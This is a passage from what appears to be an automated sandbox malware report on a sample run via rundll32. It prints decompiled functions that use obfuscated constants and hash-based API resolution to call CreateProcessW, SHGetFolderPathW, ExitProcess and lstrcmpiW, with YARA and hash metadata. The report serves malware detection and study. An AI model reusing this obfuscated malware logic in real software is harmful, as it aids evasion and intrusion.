                                                                                                                                                            • Associated: 0000000B.00000002.532394465.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532402551.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                            • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                                            • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                                                            • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                                            • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00277F5D Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 275 277f5d-277ff1 call 2820b9 call 28aa30 CreateProcessW
                                                                                                                                                            APIs
                                                                                                                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0027AD99,?,?,?,181C8C04,0027AD99), ref: 00277FEB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.531885698.0000000000270000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532098022.0000000000293000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_270000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                            • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                                            • Instruction ID: 950fa76770937ccfe08a4f48f26393eaf284fdb27e50b3a75c8c3e31513af41e
                                                                                                                                                            • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                                            • Instruction Fuzzy Hash: 4811D376402128BBDF61AFD1DD09CEF7F79EF093A4F149144FA1921121D2768A60EBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 002846BB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 280 2846bb-28473b call 2820b9 call 28aa30 SHGetFolderPathW
                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E002846BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E002820B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E0028AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}










                                                                                                                                                            0x002846d5
                                                                                                                                                            0x002846da
                                                                                                                                                            0x002846e4
                                                                                                                                                            0x002846ec
                                                                                                                                                            0x002846f3
                                                                                                                                                            0x002846f7
                                                                                                                                                            0x002846fe
                                                                                                                                                            0x00284705
                                                                                                                                                            0x0028470c
                                                                                                                                                            0x00284724
                                                                                                                                                            0x00284735
                                                                                                                                                            0x0028473b

                                                                                                                                                            APIs
                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00284735
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.531885698.0000000000270000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532098022.0000000000293000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_270000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FolderPath
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1514166925-0
                                                                                                                                                            • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                                            • Instruction ID: 4c47160fae029644297bf4164f7061c0ecb0f39fc22cd84a0016dfb846d49a74
                                                                                                                                                            • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                                            • Instruction Fuzzy Hash: 5701EC75802218BBCF15AFD5DC498DFBFB8EF45394F108145F91866211D2758A60DBD1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 002793ED Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 285 2793ed-279461 call 28aa30 ExitProcess
                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                            			E002793ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E0028AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}








                                                                                                                                                            0x002793f3
                                                                                                                                                            0x00279405
                                                                                                                                                            0x00279411
                                                                                                                                                            0x00279412
                                                                                                                                                            0x00279413
                                                                                                                                                            0x0027941a
                                                                                                                                                            0x00279421
                                                                                                                                                            0x00279428
                                                                                                                                                            0x00279433
                                                                                                                                                            0x00279436
                                                                                                                                                            0x0027943d
                                                                                                                                                            0x00279444
                                                                                                                                                            0x00279451
                                                                                                                                                            0x0027945b

                                                                                                                                                            APIs
                                                                                                                                                            • ExitProcess.KERNELBASE(00000000), ref: 0027945B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.531885698.0000000000270000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532098022.0000000000293000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_270000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                            • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                                            • Instruction ID: 41e3f3a649c1c770c3589a49e8dad32910a6bb4acab3e2206ca78253d98dc695
                                                                                                                                                            • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                                            • Instruction Fuzzy Hash: 90F03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9D604B3261E7745F459B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0027B23C Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 305 27b23c-27b2c6 call 2820b9 call 28aa30 lstrcmpiW
                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E0027B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002820B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E0028AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}







                                                                                                                                                            0x0027b23f
                                                                                                                                                            0x0027b240
                                                                                                                                                            0x0027b241
                                                                                                                                                            0x0027b244
                                                                                                                                                            0x0027b247
                                                                                                                                                            0x0027b24a
                                                                                                                                                            0x0027b24e
                                                                                                                                                            0x0027b24f
                                                                                                                                                            0x0027b254
                                                                                                                                                            0x0027b25e
                                                                                                                                                            0x0027b26a
                                                                                                                                                            0x0027b271
                                                                                                                                                            0x0027b278
                                                                                                                                                            0x0027b27f
                                                                                                                                                            0x0027b286
                                                                                                                                                            0x0027b28d
                                                                                                                                                            0x0027b294
                                                                                                                                                            0x0027b29b
                                                                                                                                                            0x0027b2b3
                                                                                                                                                            0x0027b2c1
                                                                                                                                                            0x0027b2c6

                                                                                                                                                            APIs
                                                                                                                                                            • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 0027B2C1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.531885698.0000000000270000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000B.00000002.532098022.0000000000293000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_270000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1586166983-0
                                                                                                                                                            • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                                            • Instruction ID: 15794418453f5d9b48416b83e33238ef218e77120e0968befb57974a09bd7515
                                                                                                                                                            • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                                            • Instruction Fuzzy Hash: 66015A72C00208FFDF45DFD4DD468AEBB71EB40300F108088B90562152E3714B609B51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%